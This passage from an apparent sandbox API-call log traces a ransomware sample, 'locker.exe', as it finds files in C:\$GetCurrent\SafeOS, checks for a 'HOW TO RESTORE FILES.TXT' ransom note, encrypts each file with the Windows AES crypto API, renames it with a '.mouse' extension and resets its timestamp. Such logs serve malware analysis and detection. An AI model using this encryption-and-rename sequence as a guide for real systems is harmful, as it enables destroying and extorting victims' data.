lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbc0 [0198.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cbc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0198.073] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb48 | out: hHeap=0x3c0000) returned 1 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb48 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.073] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb48 | out: hHeap=0x3c0000) returned 1 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b950 [0198.073] AreFileApisANSI () returned 1 [0198.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b950, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3ec7b8 [0198.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b950, cbMultiByte=-1, lpWideCharStr=0x3ec7b8, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT") returned 47 [0198.073] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\safeos\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767ae577, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x767ae577, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x767d471e, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x71)) returned 1 [0198.073] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.073] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b950 | out: hHeap=0x3c0000) returned 1 [0198.073] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c)) returned 1 [0198.075] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.075] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.076] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9c [0198.076] CloseHandle (hObject=0x3bc) returned 1 [0198.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.076] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.076] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d650 [0198.076] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d650, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d650 | out: hHeap=0x3c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.076] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.076] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9c [0198.076] CloseHandle (hObject=0x3bc) returned 1 [0198.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d98 [0198.077] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419de8 [0198.077] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0198.077] GetFileType (hFile=0x3bc) returned 0x1 [0198.077] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xbc) returned 0x4163e8 [0198.077] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xbc) returned 0x42c8a8 [0198.077] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0198.078] ReadFile (in: hFile=0x3bc, lpBuffer=0x3f6f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesRead=0x12af714*=0x9c, lpOverlapped=0x0) returned 1 [0198.079] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x9c, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.080] GetVersion () returned 0x23f00206 [0198.080] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0198.082] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x4329f8) returned 1 [0198.082] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0198.082] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41cd60 [0198.082] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x41cd60*, pdwDataLen=0x12af88c*=0x9c, dwBufLen=0xa0 | out: pbData=0x41cd60*, pdwDataLen=0x12af88c*=0xa0) returned 1 [0198.082] CryptDestroyKey (hKey=0x4329f8) returned 1 [0198.082] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0198.083] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.083] GetLastError () returned 0x0 [0198.083] SetLastError (dwErrCode=0x0) [0198.083] GetLastError () returned 0x0 [0198.083] SetLastError (dwErrCode=0x0) [0198.083] GetLastError () returned 0x0 [0198.083] SetLastError (dwErrCode=0x0) [0198.083] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41cd60 | out: hHeap=0x3c0000) returned 1 [0198.083] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af7c8*=0xa0, lpOverlapped=0x0) returned 1 [0198.084] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0198.084] CloseHandle (hObject=0x3bc) returned 1 [0198.085] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4163e8 | out: hHeap=0x3c0000) returned 1 [0198.085] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c8a8 | out: hHeap=0x3c0000) returned 1 [0198.085] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec820 [0198.085] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.085] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d878 [0198.085] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d878, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.085] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d878 | out: hHeap=0x3c0000) returned 1 [0198.085] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8e) returned 0x42adb0 [0198.085] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec820 | out: hHeap=0x3c0000) returned 1 [0198.085] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.mouse" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.mouse"), dwFlags=0x2) returned 1 [0198.086] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x41ffe0 [0198.086] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.mouse" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0198.086] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0198.086] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0198.086] CloseHandle (hObject=0x3bc) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41ffe0 | out: hHeap=0x3c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42adb0 | out: hHeap=0x3c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419de8 | out: hHeap=0x3c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d98 | out: hHeap=0x3c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd78 | out: hHeap=0x3c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.087] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x3ec6e8, dwReserved1=0x9c, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="")) returned 1 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.087] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="PartnerSetupComplete.cmd", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccd8 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="PartnerSetupComplete.cmd", cchWideChar=24, lpMultiByteStr=0x43ccd8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 24 [0198.087] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be90 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x42be90, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 46 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x42bb80, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 46 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0198.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x42be58, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 46 [0198.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b950 [0198.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=46, lpMultiByteStr=0x42b950, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 46 [0198.088] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b950 | out: hHeap=0x3c0000) returned 1 [0198.088] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0198.088] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0198.088] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be90 | out: hHeap=0x3c0000) returned 1 [0198.088] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0198.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".cmd", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".cmd", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cmd", lpUsedDefaultChar=0x0) returned 4 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b9f8 [0198.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0198.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cc10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0198.088] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b950 [0198.088] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bcd0 [0198.088] AreFileApisANSI () returned 1 [0198.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bcd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0198.088] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3ec7b8 [0198.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bcd0, cbMultiByte=-1, lpWideCharStr=0x3ec7b8, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT") returned 47 [0198.089] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\safeos\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767ae577, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x767ae577, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x767d471e, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x71)) returned 1 [0198.089] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.089] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bcd0 | out: hHeap=0x3c0000) returned 1 [0198.089] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241)) returned 1 [0198.089] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.089] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.089] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x241 [0198.089] CloseHandle (hObject=0x3bc) returned 1 [0198.089] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.089] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.089] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.089] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.089] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.090] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.090] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d770 [0198.090] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d770, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.090] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d770 | out: hHeap=0x3c0000) returned 1 [0198.090] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.090] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.090] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x241 [0198.090] CloseHandle (hObject=0x3bc) returned 1 [0198.090] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.090] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ca8 [0198.090] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c98 [0198.090] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0198.091] GetFileType (hFile=0x3bc) returned 0x1 [0198.091] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x261) returned 0x414d58 [0198.091] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x261) returned 0x440288 [0198.091] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0198.091] ReadFile (in: hFile=0x3bc, lpBuffer=0x3f6f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesRead=0x12af714*=0x241, lpOverlapped=0x0) returned 1 [0198.094] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x241, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.094] GetVersion () returned 0x23f00206 [0198.094] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0198.097] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x4329f8) returned 1 [0198.097] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0198.097] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x260) returned 0x43e570 [0198.097] CryptEncrypt (in: hKey=0x4329f8, 